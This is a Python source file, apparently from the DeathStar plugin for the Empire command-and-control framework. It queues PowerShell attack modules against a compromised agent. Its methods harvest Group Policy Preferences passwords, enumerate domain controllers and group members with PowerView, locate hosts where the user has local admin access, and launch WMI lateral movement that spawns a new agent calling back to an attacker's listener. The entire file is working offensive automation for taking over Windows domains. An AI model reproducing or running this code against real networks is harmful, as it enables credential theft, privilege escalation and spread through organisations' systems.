from empire.server.api.v2.agent.agent_task_dto import ModulePostRequest
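class DeathStarTasks:
    """Queue Empire PowerShell module tasks for a single agent.

    Each ``run_*`` method resolves the agent for ``session_id`` through
    ``main_menu.agentsv2``, builds a ``ModulePostRequest`` for one fixed
    module id and submits it via ``main_menu.agenttasksv2.create_task_module``.
    All of them return the id of the created task, or ``False`` when the
    server reported an error.  The shared submission logic lives in
    ``_task_module`` so that each public method only declares its module id
    and module-specific options.
    """

    def __init__(self, main_menu):
        # The Empire main menu object; only its ``agentsv2`` and
        # ``agenttasksv2`` attributes are used here.
        self.main_menu = main_menu

    def _task_module(self, db, session_id, module_id, options):
        """Submit module *module_id* for agent *session_id* and return the task id.

        Args:
            db: database session handed through unchanged to the Empire APIs.
            session_id: agent session id; it is also sent as the ``"Agent"``
                option of the module request.
            module_id: Empire module identifier to queue.
            options: module-specific options; they are merged after the
                ``"Agent"`` and ``"OutputFunction"`` entries every task sends,
                so they may override either.

        Returns:
            ``res.id`` of the created task, or ``False`` if
            ``create_task_module`` returned a non-empty error.  The error
            value itself is dropped here; callers only learn that the task
            was not queued, so inspect the Empire server log for the reason.
        """
        agent = self.main_menu.agentsv2.get_by_id(db, session_id)
        params = {
            "Agent": session_id,
            "OutputFunction": "Out-String",
            **options,
        }
        module_post_request = ModulePostRequest(
            module_id=module_id, options=params
        )
        # The trailing 0 is passed exactly as the original calls did; its
        # meaning is defined by create_task_module, not visible in this file.
        res, err = self.main_menu.agenttasksv2.create_task_module(
            db, agent, module_post_request, 0
        )
        if err:
            return False
        return res.id

    def run_get_gpp(self, db, session_id):
        """Queue ``powershell_privesc_gpp`` for the agent; return task id or False."""
        return self._task_module(db, session_id, "powershell_privesc_gpp", {})

    def run_get_domain_controller(self, db, session_id):
        """Queue the PowerView get-domain-controller module; return task id or False."""
        return self._task_module(
            db,
            session_id,
            "powershell_situational_awareness_network_powerview_get_domain_controller",
            {},
        )

    def run_get_group_member(self, db, sid, session_id):
        """Queue the PowerView get-group-member module for group *sid*.

        ``sid`` is sent as the ``"Identity"`` option and the lookup is always
        recursive (``"Recurse": "True"``).  Returns the task id or ``False``.
        """
        return self._task_module(
            db,
            session_id,
            "powershell_situational_awareness_network_powerview_get_group_member",
            {"Identity": sid, "Recurse": "True"},
        )

    def run_find_localadmin(self, db, session_id, domain_controller, domain):
        """Queue the PowerView find-localadmin-access module.

        *domain* becomes ``"ComputerDomain"`` and *domain_controller* becomes
        ``"Server"``; ``"ServerTimeLimit"`` is fixed at ``"60"`` as in the
        original request.  Returns the task id or ``False``.
        """
        return self._task_module(
            db,
            session_id,
            "powershell_situational_awareness_network_powerview_find_localadmin_access",
            {
                "ComputerDomain": domain,
                "Server": domain_controller,
                "ServerTimeLimit": "60",
            },
        )

    def run_invoke_wmi(self, db, session_id, listener, computer_name):
        """Queue ``powershell_lateral_movement_invoke_wmi`` for *computer_name*.

        *listener* is sent as the ``"Listener"`` option.  ``"UserName"`` and
        ``"Password"`` are always sent empty, obfuscation is off and the
        proxy/user-agent options are left at ``"default"``, exactly as the
        original request did.  Returns the task id or ``False``; on failure
        the original also printed ``"Error"`` to stdout, which is kept here.
        """
        task_id = self._task_module(
            db,
            session_id,
            "powershell_lateral_movement_invoke_wmi",
            {
                "Listener": listener,
                "UserName": "",
                "Password": "",
                "ComputerName": computer_name,
                "Obfuscate": "False",
                "ObfuscationCommand": r"Token\All\1",
                "ProxyCreds": "default",
                "Proxy": "default",
                "UserAgent": "default",
            },
        )
        if task_id is False:
            # Kept from the original; the underlying err value is not reported.
            print("Error")
        return task_id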